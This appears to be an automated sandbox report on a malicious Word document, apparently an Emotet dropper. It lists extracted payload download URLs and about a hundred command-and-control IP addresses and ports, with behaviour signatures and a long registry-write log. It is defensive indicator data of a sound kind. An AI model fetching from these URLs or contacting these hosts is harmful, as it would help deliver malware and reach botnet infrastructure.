Analysis
-
max time kernel
139s -
resource
win7v191014 -
submitted
12-12-2019 13:02
Task
task1
Sample
Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.110.doc
Resource
win7v191014
General
Malware Config
Extracted
http://acqua.solarcytec.com/rtsbgs/XiWmtYYur/
https://blog.learncy.net/wp-admin/user/oxZqQp/
http://hospitalsanrafael.ainimedina.com/wp-includes/vwf-i8ge-4445917/
https://sg771.kwikfunnels.com/phpmyadmin_bck/x9tfn-lv1h4-174129596/
http://www.siyinjichangjia.com/wp-content/WYszsP/
Extracted
emotet
190.146.14.143:443
85.235.219.74:80
78.187.204.70:80
46.105.128.215:8080
69.30.205.162:7080
192.161.190.171:8080
163.172.97.112:8080
86.98.157.3:80
113.52.135.33:7080
175.127.140.68:80
212.129.14.27:8080
200.41.121.69:443
143.95.101.72:8080
190.161.67.63:80
50.116.78.109:8080
37.46.129.215:8080
119.57.36.54:8080
212.112.113.235:80
46.105.131.68:8080
1.32.54.12:8080
139.59.12.63:8080
190.5.162.204:80
83.99.211.160:80
67.254.196.78:443
187.250.92.82:80
83.110.107.243:443
124.150.175.129:8080
123.142.37.165:80
24.28.178.71:80
190.189.79.73:80
182.176.116.139:995
86.70.224.211:80
190.171.135.235:80
115.179.91.58:80
41.218.118.66:80
85.109.190.235:443
178.134.1.238:80
95.216.207.86:7080
142.93.87.198:8080
81.82.247.216:80
95.216.212.157:8080
86.6.123.109:80
165.100.148.200:443
24.27.122.202:80
176.58.93.123:80
193.33.38.208:443
67.171.182.231:80
190.101.87.170:80
185.244.167.25:443
46.17.6.116:8080
82.79.244.92:80
181.44.166.242:80
77.245.12.212:80
158.69.167.246:8080
191.100.24.201:50000
189.225.211.171:443
181.47.235.26:993
174.57.150.13:8080
200.71.112.158:53
41.77.74.214:443
78.46.87.133:8080
192.241.220.183:8080
172.104.70.207:8080
42.51.192.231:8080
124.150.175.133:80
201.196.15.79:990
23.253.207.142:8080
221.154.59.110:80
210.224.65.117:80
60.53.3.153:8080
195.250.143.182:80
51.38.134.203:8080
89.215.225.15:80
138.197.140.163:8080
201.183.251.100:80
128.92.54.20:80
5.189.148.98:8080
110.142.161.90:80
175.103.239.50:80
195.191.107.67:80
189.61.200.9:443
192.210.217.94:8080
98.15.140.226:80
58.93.151.148:80
100.38.11.243:80
103.122.75.218:80
91.117.31.181:80
198.57.217.170:8080
122.11.164.183:80
37.59.24.25:8080
210.111.160.220:80
162.144.46.90:8080
83.156.88.159:80
78.186.102.195:80
211.218.105.101:80
187.233.220.93:443
172.90.70.168:443
72.69.99.47:80
177.103.201.23:80
72.27.212.209:8080
119.159.150.176:443
216.75.37.196:8080
188.230.134.205:80
153.190.41.185:80
45.129.121.222:443
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1296 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1296 WINWORD.EXE -
Modifies registry class 136 IoCs
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\ = "Microsoft Forms 2.0 Object Library" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\FLAGS\ = "6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\FLAGS\ = "6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{36AAA42C-3301-45BF-9D46-DC10D39ABD3B}\2.0\ = "Microsoft Forms 2.0 Object Library" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" -
